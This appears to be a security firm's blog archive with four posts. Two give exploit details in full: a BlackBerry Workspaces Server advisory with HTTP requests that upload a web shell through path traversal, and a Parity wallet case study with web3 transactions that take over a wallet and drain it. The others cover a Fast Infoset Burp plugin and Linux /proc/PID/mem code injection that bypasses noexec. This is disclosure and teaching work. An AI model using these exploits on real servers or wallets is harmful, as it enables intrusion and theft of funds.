Monday, October 16, 2017

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 - CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 - BlackBerry acknowledges receiving our report.
  • 5/16/17 - BlackBerry confirms that an investigation has started.
  • 6/6/17 - BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 - BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 - BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 - BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 - BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 - GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).
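The root cause is a classic unsanitized path join: the user-supplied uuid field is concatenated into a filesystem path, so a value beginning with "/../../" walks out of the storage directory. A minimal sketch of the flawed pattern and a safer alternative (the function names and the /opt/fileserver storage root are hypothetical illustrations, not BlackBerry's actual code):

```python
import os

# Hypothetical storage root; the real server's layout is not public.
STORAGE_ROOT = "/opt/fileserver"

def save_document_unsafe(uuid, file_name):
    # Vulnerable pattern: the user-supplied uuid is trusted, so a uuid of
    # "/../../mnt/..." walks right out of the storage root.
    return os.path.normpath(STORAGE_ROOT + "/" + uuid + "/" + file_name)

def save_document_safe(uuid, file_name):
    # Safer pattern: normalize first, then confirm the result is still
    # inside the storage root before touching the filesystem.
    path = os.path.normpath(os.path.join(STORAGE_ROOT, uuid, file_name))
    if not path.startswith(STORAGE_ROOT + os.sep):
        raise ValueError("path traversal attempt")
    return path

# The uuid from Reproduction Request #2 escapes into the webroot:
print(save_document_unsafe("/../../mnt/filespace/0/whiteLabel/", "shell.jsp"))
# -> /mnt/filespace/0/whiteLabel/shell.jsp
```

The safe variant rejects the malicious uuid, while benign values such as a real document identifier still resolve under the storage root.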

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspaces Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later
Tuesday, October 10, 2017

Pentesting Fast Infoset based web applications with Burp

If you run into a .NET application, you sometimes end up dealing with lesser-known protocols such as the WCF binary protocol or, as in a recent case, Fast Infoset: a binary encoding of the XML Infoset and an alternative to the usual text-based XML encoding. We will briefly describe the Fast Infoset format and present a Burp plugin that facilitates pentesting web applications using this XML representation.

Fast Infoset is a lossless compression format for XML-based data. The format is mostly utilised in web applications that transfer a large amount of data between a client and a server; usually a thick client processing data offline and exchanging data infrequently with a server. You can identify that Fast Infoset is involved when an HTTP request uses a Content-Type of application/fastinfoset.

An example request may look like this:

If you decompress the body with gzip, it is a little bit more readable.
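The decompression step itself is trivial with any gzip implementation. A minimal sketch (the payload bytes here are illustrative stand-ins, not a real Fast Infoset document; per the ITU-T X.891 specification, Fast Infoset documents begin with the magic number E0 00 followed by version bytes 00 01):

```python
import gzip

# Illustrative stand-in: a gzip-compressed blob whose first four bytes
# mimic the Fast Infoset magic number and version.
body = gzip.compress(b"\xe0\x00\x00\x01" + b"illustrative-fastinfoset-bytes")

# Inflate the HTTP body before inspecting it.
raw = gzip.decompress(body)
print(raw[:4].hex())  # e0000001
```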

From an attacker’s perspective, the main problem with this encoding format is that you can’t easily edit requests or responses on the fly like you would with text-based message bodies. Since the encoding relies on the previous and following strings, tampering with the data causes the server to throw an exception stating that the data you just sent is not properly encoded.

Some quick research revealed a few public repositories implementing Fast Infoset decoding, but only one (written by Lu Jun) worked properly. However, that plugin only supports viewing decoded Fast Infoset data, not editing and re-encoding it.

We decided it would be a worthwhile effort to develop a fully working Burp plugin for decoding and encoding Fast Infoset based requests. You can find a compiled JAR and the corresponding source code in the following Github repository:
https://github.com/GDSSecurity/FastInfoset-Burp-Plugin

Once you load the plugin via Burp extender, you can easily view decoded Fast Infoset requests and responses, and tamper with them in Burp Proxy and Repeater.


Wednesday, September 27, 2017

Reviewing Ethereum Smart Contracts

Ethereum has been in the news recently due to a string of security incidents affecting smart contracts running on the platform. As a security engineer, these stories piqued my interest and I began my own journey down the rabbit hole that is Ethereum “dapp” (decentralized application) development and security. I think it is a fascinating technology with some talented engineers pushing the boundaries of what is possible in an otherwise trustless network. The community has also begun to mature, as projects have started bug bounties, security best practices have been published, and vulnerabilities in the technology itself have been patched.

Still, if Ethereum’s popularity is to continue to grow, I believe that it is going to need the help of the wider security industry. And therein is a problem. Most security engineers still don’t know what Ethereum even is, let alone how to perform a security review of an application running on it.

As it turns out, there are some pretty big similarities between traditional code review and Ethereum smart contract review. This is because smart contracts are functionally just ABI (application binary interface) services. They are similar to the very API services that many security engineers are accustomed to reviewing, but use a binary protocol and set of conventions specific to Ethereum. Unsurprisingly, these details are also what make Ethereum smart contracts prone to several specific types of bugs, such as those relating to function reentrancy and underflows. These vulnerabilities are important to understand as well, although they are a bit more advanced and best suited for another blog post.

Let us take a look at a case study to examine the similarities between traditional code review and smart contract review.

A Case Study: The Parity “Multi-Sig” Vulnerability

On July 19, 2017, a popular Ethereum client named Parity was found to contain a critical vulnerability that led to the theft of $120MM. Parity allows users to set up wallets that can be managed by multiple parties, such that some threshold of authorized owners must sign a transaction before it is executed on the network. Because this is not a native feature built into the Ethereum protocol, Parity maintains its own open source Ethereum smart contract to implement it. When a user wants to create a multi-signature wallet, they actually deploy their own copy of the smart contract. As it turned out, Parity’s multi-signature smart contract contained a vulnerability that, when exploited, allowed unauthorized users to rob a wallet of all of its Ether (Ethereum’s native cryptocurrency).

Parity’s multi-signature wallet is based off of another open source smart contract that can be found here. Both are written in Solidity, which is a popular Ethereum programming language. Solidity looks and feels a lot like JavaScript, but allows developers to create what are functionally ABI services by making certain functions callable by other agents on the network. An important feature of the language is that ABI functions are publicly callable by default, unless they are marked as “private” or “internal”.

In December of 2016, a redesigned version of the multi-signature wallet contract was added to Parity’s GitHub repository with some considerable changes. The team decided to refactor the contract into a library. This meant that calls to individual multi-signature wallets would actually be forwarded to a single, hosted library contract. This implementation detail wouldn’t be obvious to a caller unless they examined the code or ran a debugger.

Unfortunately, it was during this refactor that a critical security vulnerability was introduced into the code base. When the contract code was refactored into a single library contract (think class in object-oriented programming), all of the initializer functions lost the important property of initialization: only being callable once. It was therefore possible to re-call the contract’s initialization function, even after it had already been deployed and initialized, and change the settings of the contract.

How can attacks like the one on Parity’s contract be avoided? As it turns out, the vulnerability would have likely been caught by a short code review.

Profiling Solidity Functions

As I mentioned, Ethereum smart contracts are functionally just ABI services. One of the first things we do as security engineers when reviewing an application is to map out which endpoints we have authorization (intentionally or unintentionally) to interact with.

We can easily do this for a Solidity application using a tool I wrote called the Solidity Function Profiler. Let’s run it on a vulnerable version of the multi-signature contract described earlier, looking for visible (public or external) functions that aren’t constants (possibly state changing) and don’t use any modifiers (which may be authorization checks). If we were looking for new vulnerabilities, we would obviously apply much more scrutiny to the output of the tool. For the sake of this blog post, simply looking for functions that fit the above criteria is adequate.
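The filtering criteria described above can be sketched as a simple predicate over the profiler's output. The dictionary layout below is a hypothetical model of the tool's table, not its actual output format:

```python
# Each row models one entry from the Solidity Function Profiler's table.
functions = [
    {"name": "initMultiowned(address,uint)",  "visibility": "public",   "constant": False, "modifiers": []},
    {"name": "changeOwner(address,address)",  "visibility": "external", "constant": False, "modifiers": ["onlymanyowners"]},
    {"name": "isOwner(address)",              "visibility": "public",   "constant": True,  "modifiers": []},
    {"name": "initWallet(address,uint,uint)", "visibility": "public",   "constant": False, "modifiers": []},
    {"name": "reorganizeOwners()",            "visibility": "private",  "constant": False, "modifiers": []},
]

def interesting(fn):
    # Visible (public/external), possibly state changing (not constant),
    # and without modifiers that might hide an authorization check.
    return (fn["visibility"] in ("public", "external")
            and not fn["constant"]
            and not fn["modifiers"])

print([fn["name"] for fn in functions if interesting(fn)])
# ['initMultiowned(address,uint)', 'initWallet(address,uint,uint)']
```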

For those who want to follow along at home, a vulnerable version of the contract code can be found here. This is the code that we will be referencing throughout the rest of this blog post.

Four functions fit these criteria and are marked with an asterisk (*) in the table below.

Contract       Function                           Visibility  Constant  Returns    Modifiers
WalletLibrary  ()                                 public      false                payable
WalletLibrary  initMultiowned(address,uint) *     public      false
WalletLibrary  revoke(bytes32) *                  external    false
WalletLibrary  changeOwner(address,address)       external    false                onlymanyowners
WalletLibrary  addOwner(address)                  external    false                onlymanyowners
WalletLibrary  removeOwner(address)               external    false                onlymanyowners
WalletLibrary  changeRequirement(uint)            external    false                onlymanyowners
WalletLibrary  getOwner(uint)                     external    true      address
WalletLibrary  isOwner(address)                   public      true      bool
WalletLibrary  hasConfirmed(bytes32,address)      external    true      bool
WalletLibrary  initDaylimit(uint) *               public      false
WalletLibrary  setDailyLimit(uint)                external    false                onlymanyowners
WalletLibrary  resetSpentToday()                  external    false                onlymanyowners
WalletLibrary  initWallet(address,uint,uint) *    public      false
WalletLibrary  kill(address)                      external    false                onlymanyowners
WalletLibrary  execute(address,uint,bytes)        external    false     o_hash     onlyowner
WalletLibrary  create(uint,bytes)                 internal    false     o_addr
WalletLibrary  confirm(bytes32)                   public      false     o_success  onlymanyowners
WalletLibrary  confirmAndCheck(bytes32)           internal    false     bool
WalletLibrary  reorganizeOwners()                 private     false
WalletLibrary  underLimit(uint)                   internal    false     bool       onlyowner
WalletLibrary  today()                            private     true      uint
WalletLibrary  clearPending()                     internal    false
Wallet         Wallet(address,uint,uint)          public      false
Wallet         ()                                 public      false                payable
Wallet         getOwner(uint)                     public      true      address
Wallet         hasConfirmed(bytes32,address)      external    true      bool
Wallet         isOwner(address)                   public      true      bool

Call Delegation

All four identified functions are found in the contract’s library, meaning that we may not be able to reach them because the main Wallet contract doesn’t expose them. However, a quick read of the source code reveals the use of a call forwarding pattern that delegates calls made to the Wallet contract to the WalletLibrary contract. This is done via a fallback function, which is a special function that gets called when no matching function is found during a call or when Ether is sent to a contract. With this information we know that these functions can be called.

395: contract Wallet is WalletEvents {
[..snip..]
423:   // gets called when no other function matches
424:   function() payable {
425:     // just being sent some cash?
427:     if (msg.value > 0)
428:       Deposit(msg.sender, msg.value);
429:     else if (msg.data.length > 0)
430:       _walletLibrary.delegatecall(msg.data);
431:   }

This call delegation pattern is typically discouraged due to the security implications it can pose when calling external, untrusted contracts. In this case the delegatecall function is used to proxy calls to what would be a trusted library contract, so while it is a bad practice it isn’t an active issue here. If the contract’s developers had been more explicit about what calls were allowed to be delegated by this function, the vulnerability may have never existed. However, the delegation itself is not the direct cause of the vulnerability, and continues to exist even in the patched version of this contract.

The Vulnerability: Wallet Reinitialization

If we look at the source code associated with the four functions listed above, we discover that the revoke function performs an authorization check. However, the remaining three functions don’t perform such a check and seem like they might be quite interesting. For example, the initMultiowned function sets the contract’s list of owners and the number of signatures required to perform transactions:

105:   // constructor is given number of sigs required to do protected "onlymanyowners" transactions
106:   // as well as the selection of addresses capable of confirming them.
107:   function initMultiowned(address[] _owners, uint _required) {
108:     m_numOwners = _owners.length + 1;
109:     m_owners[1] = uint(msg.sender);
110:     m_ownerIndex[uint(msg.sender)] = 1;
111:     for (uint i = 0; i < _owners.length; ++i)
112:     {
113:       m_owners[2 + i] = uint(_owners[i]);
114:       m_ownerIndex[uint(_owners[i])] = 2 + i;
115:     }
116:     m_required = _required;
117:   }

The initDaylimit function changes the daily limit on the amount of Ether that is allowed to be transacted:

200:   // constructor - stores initial daily limit and records the present day's index.
201:   function initDaylimit(uint _limit) {
202:     m_dailyLimit = _limit;
203:     m_lastDay = today();
204:   }

The initWallet function simply calls the two functions described above, passing them the function’s own arguments as wallet settings:

214:   // constructor - just pass on the owner array to the multiowned and
215:   // the limit to daylimit
216:   function initWallet(address[] _owners, uint _required, uint _daylimit) {
217:     initDaylimit(_daylimit);
218:     initMultiowned(_owners, _required);
219:   }

All of this makes sense so far, as these functions are used to initialize the state of a new wallet. However, what are these functions used for once the wallet is initialized? What would stop them from simply being re-called and overwriting the wallet’s settings?

The answer to both questions is nothing. These functions are intended to only be called once by the original owner, but there isn’t anything enforcing this. There are no authorization checks, no visibility specifiers to make the functions internal, and not a single check to make sure that the wallet hasn’t been initialized already.

This is the root cause of the vulnerability. These functions are public and state changing, and we’ve discovered this using the Solidity Function Profiler and a bit of manual code review.
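A minimal model of the flaw and the missing guard can make this concrete. Python is used here purely for illustration (the real contract is Solidity, and the addresses are shortened placeholders):

```python
class WalletModel:
    """Toy model of the wallet library's initialization logic."""

    def __init__(self):
        self.m_num_owners = 0

    def init_wallet(self, owners, required, daylimit):
        # The guard the vulnerable contract lacked: initialization must
        # only ever run once.
        if self.m_num_owners > 0:
            raise PermissionError("wallet already initialized")
        self.m_num_owners = len(owners) + 1  # supplied owners plus the sender
        self.m_required = required
        self.m_daily_limit = daylimit

wallet = WalletModel()
wallet.init_wallet(["0x4b0897..."], 2, 3)      # legitimate first call succeeds
try:
    wallet.init_wallet(["0xca35b7..."], 1, 0)  # attacker's second call is rejected
except PermissionError as err:
    print(err)  # wallet already initialized
```

Checking a piece of existing state (here, the owner count) before allowing initialization is essentially the fix that was later applied to the contract.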

Proof of Concept Reproduction

The attacker’s exploit code may have looked something like this (using the Web3 JavaScript API):

// "Reinitialize" the wallet by calling initWallet
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xe46dcfeb0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000" + attacker.slice(2,42)}); 

// Send 100 ETH to the attacker by calling execute 
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xb61d27f6000000000000000000000000" + attacker.slice(2,42) + "0000000000000000000000000000000000000000000000056bc75e2d6310000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000"})

It can be a little difficult to parse out what’s going on with raw call data. Let’s break this down a bit further using a more in-depth example reproduction. Consider the following actors with the corresponding addresses:

  •  Multi-Sig Wallet Contract: 0xde6a66562c299052b1cfd24abc1dc639d429e1d6
  •  Original Owner Account: 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
  •  Second Owner Account: 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
  •  Attacker Account: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c

The initialization of a multi-signature wallet would look something like this, where the first argument is an array of additional owner addresses, the second is the number of signatures required, and the third is a daily limit:

From:    Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    initWallet([“0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db”], 2, 3)
Result:  0x
Events:  none

We can see that there are now two owners, one being the original owner and the other being the second owner:

From:    Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    m_numOwners
Result:  2
Events:  none

From:    Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    getOwner(0)
Result:  0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
Events:  none

From:    Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    getOwner(1)
Result:  0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
Events:  none

The original owner and the second owner would then deposit funds into the wallet by sending the contract Ether (which would actually call the fallback function, which gets called when Ether is sent).

We can confirm that attempting to make a privileged call (any function using the onlymanyowners modifier) as an owner does generate a confirmation event. For example, attempting to execute a transaction above the daily limit (expressed as Wei in the call, rather than Ether) generates a Confirmation event as well as a ConfirmationNeeded event. This is expected, since an additional signature is required:

From:    Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    execute(“0xdd870fa1b7c4700f2bd7f44238821c26f7392148”, “1000000000000000000”, [])
Result:  0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1
Events:  Confirmation[
           “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
           “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”
         ]
         ConfirmationNeeded[
           “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”,
           “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
           “4”,
           “0x0”,
           “0x”
         ]

We can also confirm that attempting to make a multi-signature call as the attacker results in no execution or event generation, as the attacker’s address isn’t in the map of owner addresses. The call fails immediately:

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”, “1000000000000000000”, [])
Result:  0x0000000000000000000000000000000000000000000000000000000000000000
Events:  none

Now that we have a baseline for expected contract behavior, let’s break it by simply “reinitializing” the contract as the attacker. We give the function an array of owner addresses containing just the attacker’s address. This actually sets two owner addresses (both being the attacker’s), since the contract uses the sender’s address as well as the list of supplied owner addresses. This is an important detail for an attacker to consider, because the initWallet function doesn’t ensure that all previous owners are removed (and therefore locked out of the wallet). The side effect of calling the initWallet function again that is being exploited here is that it overwrites the first N elements of the owner address map, where N is the length of our supplied list of owner addresses:
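The overwrite behavior can be modeled directly from the initMultiowned code shown earlier: slot 1 gets the sender, slots 2..N+1 get the supplied owners, and any higher slots are left untouched. A sketch (addresses shortened for readability):

```python
def init_multiowned(m_owners, sender, owners):
    # Mirrors the library's initMultiowned: slot 1 is the caller, slots
    # 2..N+1 are the supplied owners. Existing higher slots survive.
    m_owners[1] = sender
    for i, owner in enumerate(owners):
        m_owners[2 + i] = owner
    return len(owners) + 1  # the new m_numOwners

m_owners = {}
original, second, attacker = "0x1472...", "0x4b08...", "0xca35..."

# Legitimate initialization: two owners.
num = init_multiowned(m_owners, original, [second])

# Attacker "reinitializes": slots 1 and 2 now both hold the attacker.
num = init_multiowned(m_owners, attacker, [attacker])
print(m_owners)  # {1: '0xca35...', 2: '0xca35...'}
```

In this case the attacker's call happens to overwrite both existing slots, locking the legitimate owners out entirely.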

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    initWallet([“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”], 1, 0)
Result:  0x
Events:  none

Querying the contract again for the owners, we now get:

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    getOwner(0)
Result:  0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events:  none

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    getOwner(1)
Result:  0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events:  none

We can also see that the number of required signatures has been successfully changed. The daily limit is irrelevant in this case, because the contract ignores it if only one signature is required.

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    m_required
Result:  1
Events:  none

At this point it is trivial for the attacker to steal all of the funds in the wallet. The attacker is an owner and only one signature is required. The returned 0 indicates that there is no associated ConfirmationNeeded data, and that the contract has paid out:

From:    Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:      Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:    execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”, “100000000000000000000”, [])
Result:  0x0000000000000000000000000000000000000000000000000000000000000000
Events:  SingleTransact[
           “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
           “100000000000000000000”,
           “0xca35b7d915458ef540ade6068dfe2f44e8fa733c”,
           “0x”,
           “0x0”
         ]

In this fictional example, the attacker has made off with 100 Ether (currently ~$30,000 USD).

Conclusion

Attacks involving transaction malleability, function reentrancy, and underflows all dwarf this kind of vulnerability in complexity. However, sometimes the worst vulnerabilities are hiding in plain sight rather than in underhanded or buggy code.

We have seen that applying a simple code review technique of profiling an application would have likely caught this vulnerability early on. Knowledge of the Solidity language and the EVM is required, but these can be picked up by consulting documentation, known pitfalls, and open source code bases. The underlying code review methodology stays largely the same.

Tuesday, September 5, 2017

Linux based inter-process code injection without ptrace(2)

Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory.

The /proc filesystem on Linux offers introspection into the internals of a running Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of its included dynamic libraries. This information is relatively sensitive, as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible.

The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel documentation describes the different values this setting can take. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a process’s /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only or completely block access, respectively. Most major distributions were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file.

This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process:

$ grep stack /proc/self/maps
7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0                          [stack]
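Parsing a maps entry into usable offsets is straightforward; a minimal sketch against the sample line above:

```python
import re

maps_line = "7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0                          [stack]"

# Extract the start/end addresses and permission flags for the stack region.
m = re.match(r"([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+.*\[stack\]", maps_line)
start, end = int(m.group(1), 16), int(m.group(2), 16)
perms = m.group(3)

print(hex(start), hex(end), perms)  # 0x7ffd3574b000 0x7ffd3576c000 rw-p
print(end - start)                  # 135168 bytes of stack (0x21000)
```

The start offset is what gets fed to dd later as the absolute position at which to write the payload into /proc/${PID}/mem.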

Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed.

This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem.

Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process to be overwritten. The sleep command uses the nanosleep syscall internally, which means that it will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. Because we cannot know the exact location of the stack pointer at the time the syscall returns, we prefix our payload with a NOP sled. This allows the stack pointer to be at almost any valid location: each NOP gadget simply advances the stack pointer on return until it reaches and executes our payload.

A general purpose implementation for code injection can be found at https://github.com/GDSSecurity/Cexigua. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are:

  • GNU grep (Must support -Fao --byte-offset)
  • dd (required for reading/writing to an absolute offset into a file)
  • Bash (for the math and other advanced scripting features)

The general flow of this script is as follows:

Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated.

Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries.
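The gadget search itself is ultimately a fixed byte-pattern scan over the library file, mimicking grep -Fao --byte-offset. A minimal sketch (the sample bytes are illustrative):

```python
# On x86-64, "pop rdi; ret" encodes as the two bytes 0x5f 0xc3.
GADGET = b"\x5f\xc3"

def find_gadgets(library_bytes, gadget):
    """Return every file offset at which the gadget's bytes occur,
    including overlapping matches."""
    offsets, start = [], 0
    while (i := library_bytes.find(gadget, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets

blob = b"\x90\x90\x5f\xc3\x00\x5f\xc3"  # illustrative stand-in for a library
print(find_gadgets(blob, GADGET))        # [2, 5]
```

Each raw file offset would then still need to be checked against the .text section bounds and relocated to the library's ASLR base, as described above.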

Once we have confirmed that all gadgets are available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We then re-find the gadgets in the libraries and relocate them to the correct ASLR base, so that we know their location in the memory space of the target process, rather than just in the binary on disk. As above, we verify that each gadget is in an executable memory region before we commit to using it.

The list of gadgets we require is relatively short. We need a NOP for the NOP sled discussed above, enough POP gadgets to fill all registers required for a function call, a gadget for invoking a syscall, and a gadget for calling a standard function. This combination allows us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo-instructions from our payload description file into a ROP payload. For example, on a 64-bit system, the line ‘syscall 60 0’ converts to ROP gadgets that load 60 into the RAX register and 0 into RDI, followed by a syscall gadget. This results in 40 bytes of data: three addresses and two constants, each 8 bytes. This syscall, when executed, would call exit(0).
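The byte-packing the chain builder performs can be sketched as follows (pack64 is an illustrative helper, not a function from the script):

```shell
# Pack a 64-bit value as eight little-endian \xNN escapes, ready to be
# written into the target's stack. 'syscall 60 0' serializes to five
# such 8-byte items: pop-rax gadget, 60, pop-rdi gadget, 0, and the
# syscall gadget -- 40 bytes in total.
pack64() {
  local v=$1 i
  for i in 0 1 2 3 4 5 6 7; do
    printf '\\x%02x' $(( (v >> (8 * i)) & 0xff ))
  done
}

echo "60 packs to: $(pack64 60)"
echo " 0 packs to: $(pack64 0)"
```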

